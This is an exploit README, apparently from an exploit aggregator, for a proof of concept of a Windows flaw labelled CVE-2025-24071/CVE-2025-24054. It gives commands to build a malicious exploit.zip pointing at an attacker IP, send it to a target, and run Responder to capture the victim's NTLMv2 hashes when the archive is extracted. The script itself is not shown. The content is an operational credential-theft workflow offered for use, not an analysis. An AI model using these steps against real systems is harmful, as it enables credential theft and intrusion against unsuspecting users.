## https://sploitus.com/exploit?id=A6080F46-449F-5E6A-A8FF-509CBB115CFC
๏ปฟ# CVE-2025-24071 / CVE-2025-24054 PoC
# Edit: MICROSOFT HAS BEEN RENAMED CVE-2025-24071 AS CVE-2025-24054 ๐ค
## Usage
- Execute the script
```bash
python PoC.py test 192.168.1.45
```

- Send "exploit.zip" to the target, and then you can use [Responder](https://github.com/SpiderLabs/Responder) in order to recive the NTLMv2 hash
```bash
sudo python3 responder.py -I ens33
```

- Now when the target extract the file `.zip`, Boom! we get the NTLM hashes
